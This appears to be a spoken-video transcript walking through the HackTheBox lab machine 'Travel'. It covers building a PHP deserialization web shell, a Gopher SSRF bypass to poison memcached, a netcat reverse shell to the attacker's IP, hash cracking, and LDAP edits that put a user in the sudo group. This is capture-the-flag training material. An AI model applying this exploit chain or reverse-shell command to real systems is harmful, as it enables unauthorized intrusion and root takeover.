What's up, everyone? Today I'm going to be doing travel from HackTheBox. This was an extremely hard Linux box created by XCT and JKR. I want to give a quick shout out to a few of my teammates, Jay, Siski, and Creep, for helping me get a good grasp on what is happening with the initial foothold of this box. It was pretty tough to understand. We start this box off as normal with our Nmap Scan, and we see a couple hosts in the alternative name field, so we decide to fuzz them, and we find a .git directory, and we use GitTools to dump the contents of the repository. We exploit a deserialization vulnerability via the custom feed URL parameter to write a key to memcached. Then when we try to access the key by calling the URL, the payload deserializes, and we instantiate a TemplateHelper class object that writes our content to a file in the log directory. This gets us code execution on the box. From here, we do standard enumeration and find a backup SQL database with a PHP hash that's crackable with John. Now we just SSH into the box as lynik-admin, and that's it for the user part. For root, we find the bind password for ldap and viminfo and discover that we are an ldap administrator. This means that we can change permissions of users. So we change the user password and group membership of any user to be in the sudo group, and this allows us to run sudo commands for the user that we chose to change the permissions for, gaining us a root shell on the box. I hope you enjoy this one. This was one of my favorite boxes to complete on HackTheBox, so let's get started. Okay, as always, we're going to start this box off with nmap sv sc oa, put it in the nmap directory and call it travel, and the IP address is 10.10.10.189. I've already run this, so let's take a look at the output. And we see we have port 80, 443, and we have some alternative DNS names. So let's go ahead and add those to Etsy hosts. Okay, and there are our hosts. So we have travel, blog, www, and blog dev. So let's check out blog dev and blog and travel and www. So looking at travel.htb first, we see soon. There's not a whole lot to this site, just kind of like a landing page. Then we have www, which is the same thing. And then we have blog.travel.htb, which is a blog. We've got a travel blog, awesome RSS, which looks like there's like an included RSS feed in here. And then we have blog dev.travel.htb, and we just get forbidden. So if we go to puff, and we'll do http blogdev.travel.htb, and the word list, we'll do user share word list. Now we'll do opseclist discovery web content common. And immediately we see git head. So I'm going to use a tool called GitTools by I think it's Internet Watch. And this has some nifty tools for scraping Git repositories. So if we git clone, head in there, we have a dumper. So we can git dumper, and then it asks for a URL. So our URL was this /.git, and we'll put this in blog dev git. Okay, so it's downloading pretty much everything it can. So if we head in there, let's actually move it out first. Should move to back 2. There we go. And here we don't really see anything. We can kind of reset the git repo with git reset hard. and now we see kind of the initial repository. We can get log. We can see Jane at travel. Move this to Git. This is the commit. So we have a few things in here. Let's look at the README. And in here we see allows RSS feeds to be shown on a custom WordPress page. So it's an extension that's including RSS feeds. It looks like in the to-do list there's finish logging implementation, copy RSS template, and template PHP to WordPress content themes 2020. So it looks like in here we have RSS template and template.php, which it says it's been moved under here. So if we head back over here, and we go here, and we went to template.php, maybe it's under blog, and we get a white screen, meaning maybe the template page is there. Okay, so let's get out of this. Get out of this. Okay, and looking in template, we have some stuff about making a URL safe by preventing SSRF and command injection by sanitizing the URL. It passes through escape shell arg, and then it curls the URL. And then we have this strange TemplateHelper class. And if we look at RSS template, in here, we have something that's happening to memcache, looks like. And down at the bottom, we have debug. So if set debug include debug.php. So we probably have a debug.php in here. And it doesn't really show anything. So if we were to go to that RSS, that custom RSS, which is what we came across here, and we set debug equal to something, looked at the source, we kind of see some debug output here. So if we play around with the value, set it to 0, we see a key, which looks very similar to what we saw in template.php. Was it? No, it was the one we were just in, RSS template. We see prefix xct, and over here we see xct. So this is some kind of string, and this looks like a serialized object of some kind. So what we need to figure out is what is happening here, why is this string here, what is this debug for? So if we came and we read through this, we see that there is a customfeed.xml. So if we copy it and we go and look at this URL, we see pretty much what's being imported into the awesome travel blog. So we see Sri Lankan history dates back. Sri Lankan history dates back. So this is pretty much what's being included. So it looks like it's importing some kind of XML when this runs. So if we were to do the custom feed URL parameter, and specify RIP 10.10.14.35, and we listen on port 80 and ran this, we get a connect back to our machine. So that's pretty interesting, right? And it looks like in template.php, there's a lot of stuff that will keep you from trying to access files or any type of command injection. But we do have this weird template down here called TemplateHelper, and looking back at our README, we see finished logging implementation, added RSS template. So when we look at the logging, what is in logging? Nothing there. But here in template, it looks like here's a log directory. This tries to write a file. So this is a class that's writing a file, and we may be able to exploit some kind of PHP deserialization here. So the way we can get started on that is trying to see if we can use this to write a file. And I'll make a directory called deserialized. And then we will de.php. It was git log dev kit and then template. So we're interested in this class here. So what we can do is we can create a file called test.php, and we can create data called anything. And then we can create an object, which is a new instantiation of the class, TemplateHelper, of file, and of data. And then we can print, or we can create a file name, out.file, and then we will file put contents of file name, and then we will serialize this. So we'll just say serialize or serial equals serialize object. Okay, and then we can write that. To a file. And then if we look in here, we have out.file. We can kind of see it's created a serialized object. So this is essentially that class, but in a PHP serialized object. So if we wanted to make a malicious one, we could go back into our deserialized and just change this to like PHP payload. Because what we're trying to do is we're trying to exploit this file put contents and write it to the log directory, and we want to write an evil PHP file there. So we'll do PHP system get cmd. That? Yeah, I think that's right. I don't think I need that there. I don't think I need the quotes. Okay. Yeah, that looks right. Okay, so from here, do the same thing. Oops. We run that. We can see that we get this nice evil file that accounts for the string. So where are we at now? We need to figure out where that name is coming from. The XCT isn't there. Let's make it there. So we need to figure out exactly what this is. So if we go and grab the simple PHP or SimplePy source code, after a lot of hunting around, in here we find a few interesting files. memcached.php, which is what this seems to be running. Because if we look in RSS template, we say PHP, it's writing something to memcache. So if we go and we look at memcache, in here we see a prefix, this name, so the name of this XCT thing that looks kind of like an MD5 hash. Where is it? There it is. Might actually be an MD5 hash. We see MD5 name and type. So I'm going to put this in our notes. Okay, and then if we look through all of these files, there's a lot of type. Maybe we look for $type. There's a lot of that also. Okay, so then let's head back to the file we were in. And then let's look for type in here. We see name and type, so coming up here, we see string type, either type feed for SimplePy data or type image for image data. Type feed is what we're trying to write, which is data. So if we look through all of this for type feed, we see a constant is declared in base.php where const type feed is SPC. So that means we're kind of looking for an MD5 of name, and the type is SPC, like that. And what is name is what we're looking for now. So after a while of hunting and trial and error, you come across I think we'll find it like this. So this is in memcached. But looking through here, we see that the cache name function that's naming this is MD5. So it's running MD5 over the name as well. So looking at MD5 of name, of SPC, then if we just created a... Well, here, I'll keep this up for a second. If we created a testname.php, and we said our name is equal to this feed, and then we did print MD5 of name, and concatenate that with a colon, and then concatenate that, or we can just SPC. Like that. So if we run this, it didn't like that. Unexpected print. Okay. Need a semicolon. Line 5. What's wrong with line 5? Oh, too many parentheses. We see 4E5612. Now, looking over here, we see 4E5612. So we've determined how the key name is made. So now we have enough information to forge an entry. So how are we going to go about forging an entry? Well, we can, since we know that it's calling the XML whenever it tries to access the XML. So if this didn't exist, then it wouldn't be able to import it in. And we know it calls our URL when we put it in, or RIP when we put in RIP. So if we created a feed or just anything.xml, and this is the URL we use, we can begin to create a way to inject our key. Here, we're gonna do this in Python and PHP. So we'll do key.php, where it's pretty much testname.php, except our URL is this, and that's gonna print our key. So this is the key we're gonna try to create. And looking back at our template, or RSS template, we see it has the prefix XCT. And we can also see that in the source code. And something else to check is going to be where that log directory is. So we can see that WordPress includes class simplepy.php is in includes. I think it was in the README. Yeah, WordPress content themes 2020. So over here, we have our logs directory, and we can tell it's there because it's definitely forbidden. So I'm going to bookmark that because that's where we're going to try to write our file. Okay, so coming back over here, we have our deserialize, and we'll copy DE back over to our exploit, And let's just name this, we'll name this file evil.php. Okay, so now we have our out file, our key.php, and deserialize. So we'll start our exploit, where we know we're going to need to request something. We know our key is going to equal this. No, that's not right. Our key is going to equal this. With XCT at the front. Okay, so that's all we really have so far. Now, to get around all of the protections in place for the SSRF blocking that is in the template.php, there is a tool called Gopherus that we're going to kind of utilize. Because it kind of shows us that we can use Gopher for this. So let's go ahead and grab this. And heading in there, we can Python Gopherus exploit PHP memcache. And it'll ask us for a payload. So if we just hand it a sample payload, we can kind of see what output this is giving us. And so we can see that it's just kind of adding new line characters, and then Gopher. So it sets the key. This one right here, it's kind of hard to see, but that is the length of the key, because I believe this is 16. This is going to say 17 because it's counting the new line character. So if I came back and did echo -n for no new line, we'll see that it's 16 characters. So yeah, 16, so that's the length. So we can kind of copy what this is doing in our exploit. So if we head back to our exploit, and we want to build a Gopher. It's pretty much this, except that it's not, because we need to bypass the SSRF stuff, so we'll need to change this because 127.0.0.1 is not allowed. So we can make our Gopher URL Gopher 001121. I think we can change this to just a space. I don't even think we need, no, I think we can just do that with a space. Spider, that's not right because we want this to be our key. Four, 0, and then that 16 is going to be the length of our payload. Plus 0d0a, and then our actual payload. Okay, so that's our Gopher URL. We need to define our payload and payload length. Our payload is going to be open out.file read bytes dot read, and our payload length is going to be the length of the payload and that's going to need to be a string in the URL. And so what this is going to do is essentially it's going to request in that custom feed URL our payload. So if then I print gopher URL, and we set our key, debug is 1, and custom feed URL is that, or run that, and then we call our anything XML, and we come over here and see if evil.php exists. It doesn't exist. But if we call this and then we look at the source, yeah, our key's not there either. Interesting. Okay, so coming back over here, what do we have in our exploit so far? We have a payload, our Gopher URL, which we are going to try to call after blog to get it to call that custom feed. So what we're going to need to do is request.get plus gopher URL request.get. We need to call our anything XML, and let's make sure that that is what our key is made of. 10.10.14.35 anything.xml. Yeah, okay, so MD5 of name plus SPC. I believe that should be correct. And then from here, we don't need semicolons, we're in Python. Yeah. Let's see if our key is in here. Okay, so it ran. Let's go see if there is any key at all. And it looks like our key is 536DE. So that's right. So is our evil.php there now? It looks like it is. So now it looks like we've got our evil PHP on the box, so we can just go ahead and finish out writing this Python. We won't print it. Instead, we will do another request. We'll just do requests .get http blog.travel.htb this whole thing, and then we'll do cmd equals netcat minus e bin bash 1010 1435 1337, and that can be that. So we'll set up a netcat listener. Run that. And it looks like we got to connect back on our shell. So from here, it looks like we don't have Python on the box. So we can use socat if we have socat on the box. We do, so we have socat on the box. I guess if not, we could have uploaded it. Upgrade pty with socat. Where we're pretty much just gonna copy paste socat file raw listen. That's supposed to be on me, I think. Okay. 3. Oh. This, we need to change our IP to 10, 10, 14, 35, 4444. Come over here. And look at that. We have a much cleaner shell. So in here we just have evil PHP. Heading up the way, we can look and see what is running on the box. We can't really see much. So can we do this? We can see this is running as root. We can see MySQL is running. So maybe there's some MySQL databases. So from here we can find in the root directory anything star.sql to dev null, and let's see what we get. We see a few user share MySQLs, but we also see opt WordPress backup. So if it's a SQL database, we can just run strings on it, and we see pretty much the whole database. It's just really convenient that at the end we see insert into WordPress users values admin and lynik-admin. So these are 2 hashes that I'm interested in. You have admin and lynik-admin. Oh. Okay, so I think we can just run John on hashes, give it a word list. Oh, user share word list. Rock you. Okay. Here, we'll just do this. We'll get rid of this because I thought it would like that, but it doesn't. So we'll just do it that way. Oh, it still kind of does the same thing. So that's definitely PHP hash, so we can come back in. I'm going to add admin back, and I'm going to add lynik-admin. And it says we can do format phpass. Like that. Let this run. Looks like it finished. Remaining one, so it looks like I got one. So John -- show. Hashes. Looks like lynik-admin cracked as one step closer. So remembering that there's SSH on the box, we can try to SSH as lynik-admin. I'll do this in a new window. SSH as lynik-admin. Oh, at travel.htb. And it prompts us for a password, whereas literally everyone else on travel just gives us that. So looks like we're on the right track. Give it one step closer, and we're on the box. So who am I? lynik-admin. We don't know the password, so sudo -l isn't gonna help. ID, groups, nothing important. Looking through this home directory, we see a viminfo and an ldapRC, which is kind of out of the norm. So looking at viminfo, we see we have a bind password. So that's for Active Directory. And then looking at ldapRC, it looks like we have the host, base, and the bind en. Okay, so from here, we can ldapsearch. Give it the bind password. Give it the bind en. Give it the base. And then ldap travel.htb. And it looks like we have 22 responses. So looking through this, looks like we have Johnny, Luis, Christopher, Edward, Lynik, Brian, a bunch of things. We don't really see a whole lot of information about it. Looking at the host file, we see there's an ldap travel.htb. So let's try this at ldap and see if we get anything better. Not really. Okay, so what if we got rid of, or what if we did that LLL thing? I don't think that helped at all. Okay, so what if we got rid of the base? feel like I can never remember this. Did I forget the H? Does that actually matter? Oh yeah, I guess it does. Okay, so it looks like we can see a lot more information about each person now. We can see the CN, the SN, given name, login, shell, UID, and GID number. And when we're running up these, we look for ourselves, which don't see us. Ah, lynik. There we are. So we're in UID 5000, group ID 5000. Oh no, that's lynik. We're a lynik-admin. Ah, so lynik-admin, this is us. We are an LDAP administrator. So this means that we can change stuff. And this is looks like some kind of base 64. That's our user password, which is, it's like some kind of weak encryption, I'm pretty sure. Yeah, okay. So it's a salted SHA, so it's probably not that weak. Okay, so, but we could crack this if we wanted. It would crack to the password, the bind password. So I guess that means that's our password, which is the road less traveled. I did sudo. No, that's not our password. We already got our password. Yeah, and earlier I said we can't do sudo -l because we don't have the password, but we do. It's one step closer. But we can't run the sudo, so. But we are an LDAP administrator, which means we can modify users with ldapmodify, which we have on the box. And in here, we can read modifications from a file. This is an example. So assuming that the file temp entry mods exists and has these contents, the command ldapmodify -f temp entry mods will replace the contents of modify means entries mail attribute. So it looks like we can change things. So what we can do is we can probably just kind of copy this into temp entry mods. Actually, let's pick on someone. Because since we can change permissions, we could probably change anyone. So let's pick Luis. Okay, so Luis Griffin. Right, okay. We're going to try to change, similar to how we have a user password up here. Where was it? We're going to try to give that a user password, and we're also going to try to modify the GID. And we're going to try to do modify that person to root number 27, which is sudo. So how would we do that? Vim temp entry mods, paste this stuff in. All this needs to, okay. Okay, so the dn is modify me at, here, I'm just gonna sshn again. There we go. SSH as lynik-admin at 10.10.10.189. One step closer. Okay, and in here, ldapsearch x minus w, the road less traveled. Oh wow, I should have done that in the first place. That was way easier. Okay, so we're looking for Luis. This is the DN. Change type is modify. We're going to replace group ID, and group ID is going to be 27, and we're going to add user password, and user password is going to be poop123. And we'll see if that works. I'm not super sure that this is going to work like this. Okay, so then we ldapmodify minus f temp entry mods, the road less traveled, invalid credentials. What? Okay, I'm just going to put it on my clipboard then. Okay, same thing. Invalid credentials. Oh, is it my one step closer password? One step closer. What? These are not found. No secret in database. Should I just be putting in W right here? The road less traveled. Interesting. Maybe I need to specify this. Why is it in the ldapRC if it just doesn't work automatically? Ah, so that seems to work. Undefined attribute type 17, additional info, GID attribute type undefined. Is it not GID? What is it called? GID number, okay. So this now needs to be replaced because I think we already added it. GID number, replace GID number. Okay. Try that again. Looks like it modified Luis. So let's see if we can SSH Luis. Yes. Try that again. Okay, so that didn't work. Let's try it from here. Luis. At 10.10.10.189. What? So you use their modify add. Does this need to be add? User password already exists. Huh. Okay, so maybe I need to add an SSH key here. Ah, perfect. So we'll just do temp entry mods 2, read temp entry mods 1. Go here, paste that. Come here, delete all that. And we can just SSH keygen -I Luis. No, SSH keygen -f Luis. Cat Luis.pub. Perfect. So we'll just copy this. Paste it here. Entry mods 2. Modified entry. So now we can just SSH in as Luis with Luis's key. And we're Luis. So from here, we can look at our groups. We're in sudo. Sudo -l. Password, we set it to poop123. We can run the following commands on travel, all, so we can just sudo bin bash. Okay, and from here, who am I? ID, host name, date. Route, travel. I guess it's Saturday now. Started this on Friday. But anyway, yeah, that's the box. I hope you guys enjoyed it, and I'll catch you guys next week.